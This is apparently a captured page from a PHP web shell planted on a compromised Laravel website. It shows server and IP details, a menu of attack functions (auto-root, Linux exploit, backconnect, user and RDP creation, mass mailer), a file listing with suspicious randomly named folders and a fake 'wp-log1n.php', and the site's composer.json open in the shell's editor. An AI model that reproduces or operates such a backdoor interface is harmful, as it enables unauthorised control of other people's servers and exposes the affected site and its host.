Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.142
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechhcmsa.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
086c00
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bkrtaex
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
care
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dsihzgx
[ DIR ]
drwxr-xr-x
f30b7
[ DIR ]
dr-xr-xr-x
gvzft1i
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lbygxit
[ DIR ]
drwxr-xr-x
nwiftsc
[ DIR ]
drwxr-xr-x
pavksuw
[ DIR ]
drwxr-xr-x
product-images
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vocshrp
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
xklioj1
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-r--r--
.env
1.69
KB
-rw-r--r--
.env.example
1.65
KB
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
349
B
-rw-r--r--
.htaccess
1.13
KB
-r-xr-xr-x
.styleci.yml
181
B
-rw-r--r--
_ide_helper.php
1001.03
KB
-rw-r--r--
artisan
1.65
KB
-rwxr-xr-x
composer.json
3.07
KB
-rw-r--r--
composer.lock
482.67
KB
-rw-r--r--
google0f195a36a1ebd30e.html
53
B
-rw-r--r--
index.php
12.46
KB
-r-xr-xr-x
license-xhtj.php
629
B
-rw-r--r--
package-lock.json
745.97
KB
-rw-r--r--
package.json
1.06
KB
-rw-r--r--
phpunit.xml
1.15
KB
-rw-r--r--
plugins.php
2
KB
-rw-rw-rw-
robots.txt
89
B
-rw-r--r--
tailwind.config.js
573
B
-rw-r--r--
webpack.mix.js
9.7
KB
-rw-r--r--
wp-log1n.php
1.93
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": [ "framework", "laravel" ], "license": "MIT", "version": "8.5.0", "require": { "php": "^8.1", "ext-json": "*", "anandsiddharth/laravel-paytm-wallet": "^2.0", "authorizenet/authorizenet": "^2.0", "barryvdh/laravel-debugbar": "^3.8", "barryvdh/laravel-dompdf": "^2.0", "firebase/php-jwt": "^5.5", "gerardojbaez/money": "^0.3.1", "google/apiclient": "^2.6", "guzzlehttp/guzzle": "^7.4", "lab404/laravel-impersonate": "^1.7.4", "laracasts/flash": "^3.2", "laravel/framework": "^10.21", "laravel/tinker": "^2.8", "laravelcollective/html": "^6.4", "league/flysystem-aws-s3-v3": "^3.0", "livewire/livewire": "^3.4.2", "maatwebsite/excel": "^3.1", "macsidigital/laravel-zoom": "^7.0", "mariuzzo/laravel-js-localization": "^1.10", "mews/purifier": "^3.4", "opcodesio/log-viewer": "^3.1", "rap2hpoutre/laravel-log-viewer": "^2.3", "rappasoft/laravel-livewire-tables": "^3.2", "razorpay/razorpay": "^2.8", "simplesoftwareio/simple-qrcode": "^4.2", "spatie/laravel-google-calendar": "^3.5", "spatie/laravel-medialibrary": "^10.7", "spatie/laravel-permission": "^5.8", "srmklive/paypal": "^3.0", "stripe/stripe-php": "^7.98", "tightenco/ziggy": "^1.1", "unicodeveloper/laravel-paystack": "^1.1" }, "require-dev": { "barryvdh/laravel-ide-helper": "^2.13", "beyondcode/laravel-query-detector": "^1.7", "fakerphp/faker": "^1.9.1", "laravel/breeze": "^1.18", "laravel/sail": "^1.18", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^6.3", "phpunit/phpunit": "^9.5.10", "spatie/laravel-ignition": "^2.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" }, "files": [ "app/helpers.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true }, "minimum-stability": "stable", "prefer-stable": true }
Close